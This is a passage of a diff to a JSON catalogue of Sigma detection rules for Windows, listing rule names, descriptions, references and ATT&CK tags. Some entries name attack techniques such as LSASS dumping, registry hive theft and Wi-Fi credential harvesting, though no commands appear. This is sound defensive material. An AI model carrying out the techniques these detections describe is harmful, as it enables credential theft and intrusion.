"https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml" ], "tags": [ @@ -37940,6 +48562,15 @@ "attack.t1218.010" ] }, + "related": [ + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", "value": "Suspicious Regsvr32 Execution From Remote Share" }, @@ -37956,8 +48587,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/klinix5/InstallerFileTakeOver", "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", + "https://github.com/klinix5/InstallerFileTakeOver", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml" ], "tags": [ @@ -37965,6 +48596,15 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "af8bbce4-f751-46b4-8d91-82a33a736f61", "value": "Possible InstallerFileTakeOver LPE CVE-2021-41379" }, @@ -37992,6 +48632,15 @@ "attack.t1021.001" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", "value": "Suspicious Add User to Remote Desktop Users Group" }, @@ -38008,8 +48657,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification.yml" ], "tags": [ @@ -38040,6 +48689,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", "value": "PowerShell Download from URL" }, @@ -38103,8 +48761,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/cglyer/status/1182389676876980224", "https://twitter.com/cglyer/status/1182391019633029120", + "https://twitter.com/cglyer/status/1182389676876980224", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" ], "tags": [ @@ -38112,6 +48770,15 @@ "attack.t1546.003" ] }, + "related": [ + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", "value": "WMI Backdoor Exchange Transport Agent" }, @@ -38190,6 +48857,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8202070f-edeb-4d31-a010-a26c72ac5600", "value": "Shells Spawned by Web Servers" }, @@ -38206,14 +48882,14 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", - "https://twitter.com/Hexacorn/status/776122138063409152", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", "https://reaqta.com/2017/12/mavinject-microsoft-injector/", "https://github.com/SigmaHQ/sigma/issues/3742", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://twitter.com/Hexacorn/status/776122138063409152", "https://twitter.com/gN3mes1s/status/941315826107510784", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" ], "tags": [ @@ -38223,6 +48899,22 @@ "attack.t1218.013" ] }, + "related": [ + { + "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1bae753e-8e52-4055-a66d-2ead90303ca9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", "value": "Mavinject Inject DLL Into Running Process" }, @@ -38247,6 +48939,15 @@ "attack.t1218.007" ] }, + "related": [ + { + "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", "value": "Suspicious Msiexec Quiet Install From Remote Location" }, @@ -38271,6 +48972,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e", "value": "Proxy Execution Via Explorer.exe" }, @@ -38295,6 +49005,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", "value": "CreateMiniDump Hacktool" }, @@ -38335,12 +49054,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", - "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_ip_scanner.yml" ], "tags": [ @@ -38365,8 +49084,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/med0x2e/status/1520402518685200384", "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml", + "https://twitter.com/med0x2e/status/1520402518685200384", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml" ], "tags": [ @@ -38375,6 +49094,15 @@ "attack.t1212" ] }, + "related": [ + { + "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bb76d96b-821c-47cf-944b-7ce377864492", "value": "Suspicious NTLM Authentication on the Printer Spooler Service" }, @@ -38425,6 +49153,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9f107a84-532c-41af-b005-8d12a607639f", "value": "Cabinet File Expansion" }, @@ -38449,6 +49186,15 @@ "attack.t1489" ] }, + "related": [ + { + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "220457c1-1c9f-4c2e-afe6-9598926222c1", "value": "Delete All Scheduled Tasks" }, @@ -38498,6 +49244,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", "value": "TropicTrooper Campaign November 2018" }, @@ -38514,9 +49269,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp", "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml", - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml" ], "tags": [ @@ -38524,6 +49279,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1dd05363-104e-4b4a-b963-196a534b03a1", "value": "Suspicious Mofcomp Execution" }, @@ -38565,8 +49329,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall", "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall", "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_firewall_disable.yml" ], @@ -38576,6 +49340,15 @@ "attack.s0108" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "57c4bf16-227f-4394-8ec7-1b745ee061c3", "value": "Firewall Disabled via Netsh" }, @@ -38600,6 +49373,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "074e0ded-6ced-4ebd-8b4d-53f55908119d", "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl" }, @@ -38626,6 +49408,15 @@ "attack.t1218.009" ] }, + "related": [ + { + "dest-uuid": "c48a67ee-b657-45c1-91bf-6cdbe27205f8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cc368ed0-2411-45dc-a222-510ace303cb2", "value": "Regasm/Regsvcs Suspicious Execution" }, @@ -38653,6 +49444,15 @@ "attack.t1185" ] }, + "related": [ + { + "dest-uuid": "544b0346-29ad-41e1-a808-501bb4193f47", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", "value": "Browser Started with Remote Debugging" }, @@ -38669,8 +49469,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md", "https://www.pdq.com/pdq-deploy/", + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdq_deploy.yml" ], "tags": [ @@ -38682,6 +49482,28 @@ "uuid": "d679950c-abb7-43a6-80fb-2a480c4fc450", "value": "Use of PDQ Deploy Remote Adminstartion Tool" }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_invocation_specific.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_invocation_specific.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "536e2947-3729-478c-9903-745aaffe60d2", + "value": "Suspicious PowerShell Invocations - Specific - ProcessCreation" + }, { "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", "meta": { @@ -38720,9 +49542,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", - "https://attack.mitre.org/techniques/T1036/", + "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml" ], "tags": [ @@ -38730,6 +49551,15 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0ba1da6d-b6ce-4366-828c-18826c9de23e", "value": "Highly Relevant Renamed Binary" }, @@ -38746,8 +49576,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bootconf_mod.yml" ], "tags": [ @@ -38755,9 +49585,51 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1444443e-6757-43e4-9ea4-c8fc705f79a2", "value": "Modification of Boot Configuration" }, + { + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/24", + "falsepositive": [ + "Other tools that work with encoded scripts in the command line instead of script files" + ], + "filename": "proc_creation_win_susp_powershell_encoded_cmd_patterns.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_cmd_patterns.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "value": "Suspicious PowerShell Encoded Command Patterns" + }, { "description": "Detect the harvesting of wifi credentials using netsh.exe", "meta": { @@ -38804,6 +49676,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "value": "Schtasks From Suspicious Folders" }, @@ -38829,6 +49710,15 @@ "attack.t1552.006" ] }, + "related": [ + { + "dest-uuid": "8d7bd4f5-3a89-4453-9c82-2c8894d5655e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "05f3c945-dcc8-4393-9f3d-af65077a8f86", "value": "Suspicious SYSVOL Domain Group Policy Access" }, @@ -38855,6 +49745,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "81325ce1-be01-4250-944f-b4789644556f", "value": "Suspicious Schtasks From Env Var Folder" }, @@ -38871,8 +49770,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml" ], "tags": [ @@ -38896,8 +49795,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" ], "tags": [ @@ -38929,6 +49828,15 @@ "attack.t1218.010" ] }, + "related": [ + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", "value": "Regsvr32 Flags Anomaly" }, @@ -38945,9 +49853,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml" ], "tags": [ @@ -38997,8 +49905,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml" ], "tags": [ @@ -39031,6 +49939,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", "value": "Malicious Base64 Encoded PowerShell Keywords in Command Lines" }, @@ -39047,9 +49964,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html", "https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", + "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_dump.yml" ], "tags": [ @@ -39057,6 +49974,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "value": "LSASS Memory Dumping" }, @@ -39081,6 +50007,15 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0a13e132-651d-11eb-ae93-0242ac130002", "value": "Suspicious Auditpol Usage" }, @@ -39106,6 +50041,15 @@ "attack.t1564.001" ] }, + "related": [ + { + "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "efec536f-72e8-4656-8960-5e85d091345b", "value": "Set Suspicious Files as System Files Using Attrib" }, @@ -39130,6 +50074,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "883835a7-df45-43e4-bf1d-4268768afda4", "value": "Regedit as Trusted Installer" }, @@ -39146,8 +50099,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securelist.com/schroedingers-petya/78870/", "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100", + "https://securelist.com/schroedingers-petya/78870/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml" ], "tags": [ @@ -39159,6 +50112,29 @@ "car.2016-04-002" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "79aeeb41-8156-4fac-a0cd-076495ab82a1", "value": "NotPetya Ransomware Activity" }, @@ -39175,8 +50151,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://asec.ahnlab.com/en/38156/", "https://github.com/fatedier/frp", + "https://asec.ahnlab.com/en/38156/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_frp.yml" ], "tags": [ @@ -39184,6 +50160,15 @@ "attack.t1090" ] }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "32410e29-5f94-4568-b6a3-d91a8adad863", "value": "Fast Reverse Proxy (FRP)" }, @@ -39201,9 +50186,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", - "https://attack.mitre.org/techniques/T1036/", + "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary.yml" ], "tags": [ @@ -39211,6 +50195,15 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", "value": "Renamed Binary" }, @@ -39227,7 +50220,6 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/techniques/T1196/", "https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_control_panel_item.yml" ], @@ -39239,6 +50231,22 @@ "attack.t1546" ] }, + "related": [ + { + "dest-uuid": "4ff5d6a8-c062-4c68-a778-36fc5edd564f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", "value": "Control Panel Items" }, @@ -39263,6 +50271,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "344482e4-a477-436c-aa70-7536d18a48c7", "value": "Execution via MSSQL Xp_cmdshell Stored Procedure" }, @@ -39280,8 +50297,8 @@ "logsource.product": "windows", "refs": [ "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", - "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_grabbing_sensitive_hives_via_reg.yml" ], @@ -39293,6 +50310,29 @@ "car.2013-07-001" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fd877b94-9bb5-4191-bb25-d79cbd93c167", "value": "Grabbing Sensitive Hives via Reg Utility" }, @@ -39309,12 +50349,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://www.joeware.net/freetools/tools/adfind/", - "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", - "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_usage.yml" ], "tags": [ @@ -39325,6 +50365,22 @@ "attack.t1069.002" ] }, + "related": [ + { + "dest-uuid": 